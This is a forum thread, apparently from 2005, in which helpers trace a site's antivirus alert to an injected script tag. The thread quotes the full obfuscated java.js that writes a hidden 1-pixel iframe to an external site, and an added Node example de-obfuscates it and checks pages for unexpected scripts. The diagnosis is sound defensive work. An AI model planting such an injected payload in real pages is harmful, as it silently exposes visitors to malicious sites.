Eek! trojan on my website, where's it from?
On:
http://www.roughdisko.com
which I have made, I get a virus scan message in McAfee, Exploit-MhtRedir.gen.
I've looked in the HTML and can't see anything out of the ordinary.
If anybody could pinpoint the culprit for me that would be great! (the usual rgt click view source etc..).
BTW, it's with Pickaweb. I've a few sites with them, and on one of them the guestbook got hijacked by some Turkish hackers a while ago.
Ta!
Originally posted by hade
On:
http://www.roughdisko.com
which I have made, I get a virus scan message in McAfee, Exploit-MhtRedir.gen.
I've looked in the HTML and can't see anything out of the ordinary.
If anybody could pinpoint the culprit for me that would be great! (the usual rgt click view source etc..).
BTW, it's with Pickaweb. I've a few sites with them, and on one of them the guestbook got hijacked by some Turkish hackers a while ago.
Ta!
What server is your site running on? Bet you it's IIS.
Get in touch with your host, as it looks (to me) as if the box it is on has been compromised - can't see anything wrong with your HTML ;).
lonesome 29-04-2005, 14:28
Nope... the site runs on Linux: http://uptime.netcraft.com/up/graph/?host=www.roughdisko.com. I can't see anything in your HTML unless some of the JavaScript is triggering Norton. Has this message always occurred or just suddenly started?
It's running on a Linux server. I just noticed the problem today; the website has been up for a number of months now and it has never happened before.
A few more things I've noticed:
McAfee tells me the trojan is in a file called enter[1].htm
The status bar has 3 dots, as opposed to the usual "Done", and flickers slightly as if there is some sort of activity going on.
All the main pages of the site have exactly the same furniture, and the content has been added using the div tag (layers in D/weaver).
The only javascript in there is the stuff made with Fireworks for the rollovers and opening windows, all the pages use the same .js file for the rollovers too.
Could the host be using some sort of redirector frame, like what you get with the kickme.to kickass.at redirectors? May this be causing it?
Eeh, by eck!
I just had a look; I use XP and I got a "Do you want to install..." box which, every time I tried to close it, just kept reappearing... it was asking me to install "web.exe"... does that help?
:suspect:
lonesome 29-04-2005, 15:18
Right at the bottom of the HTML for the main page is this:
<script language=javascript src="/images/java.js"></script>
which is doing the flickering-dots thing in the status bar. This JavaScript creates an invisible iframe to http://www.fotoprofit.com/photo_catalog/index.php, which looks to be a bit of a dodgy site, so this is probably where the problem is.
I'm not sure how this line could have been inserted into your HTML if you didn't do it yourself, but if it was placed there by someone else then I would consider telling your host and changing your passwords.
Regards,
Grant
Could it be anything to do with:
<script language=javascript src="/images/java.js"></script>
just before the closing body tag? The contents of java.js is:
url = "http://www.fotoprofit.com/photo_catalog/index.php";
qwe = ' di'+'spl'+'ay:n'+'one'+';}</s'+'ty'+'le>';
rty = '" FR'+'AMEB'+'ORD'+'ER="0" WIDTH=1 HEIGHT=1'+'0%></I'+'F'+'RA'+'ME>';
uio = '<s'+'tyl'+'e type="text/css">';
asd = '<IF'+'RA'+'ME SRC="';
fgh = ' .t'+'ex'+'t {vi'+'sib'+'ili'+'ty:h'+'idd'+'en;';
a = asd+url+rty;
b = uio+fgh+qwe;
document.write (a);
document.write (b);
self.focus();
setInterval("window.status='...'",7);
www . fotoprofit . com, by the way, redirects to brides . ru, so it is very likely this is your problem. As lonesome said, remove the JavaScript line straight away and then find out how it got there.
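An added example, not code from the thread or from anyone posting in it, covering both lonesome's analysis of java.js and the advice to find the injected line: it runs the posted snippet with document.write stubbed out so the concatenated strings can be read in clear, flags the hidden iframe they produce, and scans a constructed page footer for script tags whose src is not on a known-good list. The rollover script name /images/rollovers.js and the sample footer are constructed for the example; the snippet itself is the one quoted above. Runs under Node; nothing is fetched and no real DOM is touched.

```javascript
// Added example (not from the thread). Two defender-side checks:
//  1. reveal what the obfuscated java.js writes into the page, by executing it
//     with every browser global it touches replaced by a stub;
//  2. report <script src> tags on a page that are not in a known-good list.

// The snippet exactly as posted in the thread.
const POSTED_SNIPPET = `
url = "http://www.fotoprofit.com/photo_catalog/index.php";
qwe = ' di'+'spl'+'ay:n'+'one'+';}</s'+'ty'+'le>';
rty = '" FR'+'AMEB'+'ORD'+'ER="0" WIDTH=1 HEIGHT=1'+'0%></I'+'F'+'RA'+'ME>';
uio = '<s'+'tyl'+'e type="text/css">';
asd = '<IF'+'RA'+'ME SRC="';
fgh = ' .t'+'ex'+'t {vi'+'sib'+'ili'+'ty:h'+'idd'+'en;';
a = asd+url+rty;
b = uio+fgh+qwe;
document.write (a);
document.write (b);
self.focus();
setInterval("window.status='...'",7);
`;

// Execute the snippet with stubs for document, self, window and setInterval,
// so its only observable effect is the list of strings passed to document.write.
// Its bare assignments (url = ..., a = ...) land on Node's globalThis, just as
// they would on `window` in a browser; harmless here.
function capturedWrites(snippet) {
  const writes = [];
  const stubs = {
    document: { write: (s) => writes.push(String(s)) },
    self: { focus: () => {} },
    window: { status: '' },
    setInterval: () => 0,
  };
  const run = new Function(...Object.keys(stubs), snippet);
  run(...Object.values(stubs));
  return writes;
}

// Read one attribute value (quoted or bare) out of a tag's attribute string.
function attr(attrs, name) {
  const m = attrs.match(new RegExp(`\\b${name}\\s*=\\s*["']?([^"'\\s>]+)`, 'i'));
  return m ? m[1] : undefined;
}

// List every iframe in the markup and flag the hidden-iframe shape:
// a width or height of 1 pixel or less.
function findIframes(html) {
  const found = [];
  const iframeRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = iframeRe.exec(html)) !== null) {
    const width = attr(m[1], 'width');
    const height = attr(m[1], 'height');
    const tiny = [width, height].some((v) => v !== undefined && parseFloat(v) <= 1);
    found.push({ src: attr(m[1], 'src') || '', width, height, tiny });
  }
  return found;
}

function analyseSnippet(snippet) {
  const html = capturedWrites(snippet).join('\n');
  return {
    html,
    iframes: findIframes(html),
    // Concealing style rules are the other half of the trick.
    hidingCss: /display\s*:\s*none|visibility\s*:\s*hidden/i.test(html),
  };
}

// Constructed sample of a page footer like the one described in the thread:
// the site's own rollover script (hypothetical name) followed by the injected line.
const SAMPLE_PAGE = `
<script language="javascript" src="/images/rollovers.js"></script>
</div>
<script language=javascript src="/images/java.js"></script>
</body></html>`;

// Return the src of every external script that is not in the known-good list.
function unexpectedScripts(html, allowedSrcs) {
  const out = [];
  const re = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (!allowedSrcs.includes(m[1])) out.push(m[1]);
  }
  return out;
}

const report = analyseSnippet(POSTED_SNIPPET);
console.log(report.html);
console.log(report.iframes, 'hiding CSS:', report.hidingCss);
console.log('unexpected scripts:', unexpectedScripts(SAMPLE_PAGE, ['/images/rollovers.js']));
```

The first check is the same thing lonesome did by hand: once the string pieces are joined, the snippet is a 1-pixel-wide IFRAME pointing at the fotoprofit URL plus a style block that hides content. The second check is what a site owner can run over every HTML file after cleaning up: any script src that is not the one rollover file the pages are known to use is worth a look.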
Sorted!
It was the line: <script language="javascript" src="/images/java.js"></script>
Thanks for all your help!
Don't stop there though - did you put it there?
Originally posted by LL200
Don't stop there though - did you put it there?
Now why would I want to do a thing like that?
It's well out of order when sados hijack innocent little websites; what's the point?
Apologies, I didn't mean to imply that you'd do it on purpose, but if you didn't put it there then someone did, and it's definitely worth investigating, even if all you do is contact your host and tell them.
Glasstop 04-05-2005, 09:50
We recently had the same sort of problem: someone was trying a dictionary attack on one of our servers and found a user with the user name “staff” and the password “staff” (dumb, I know).
They managed to upload a few dangerous files and host a page that looked just like an eBay page but stole your username and password. We found it and removed it after about 3 hours, filled in all the holes and notified the user.
There is a lot of it about out there.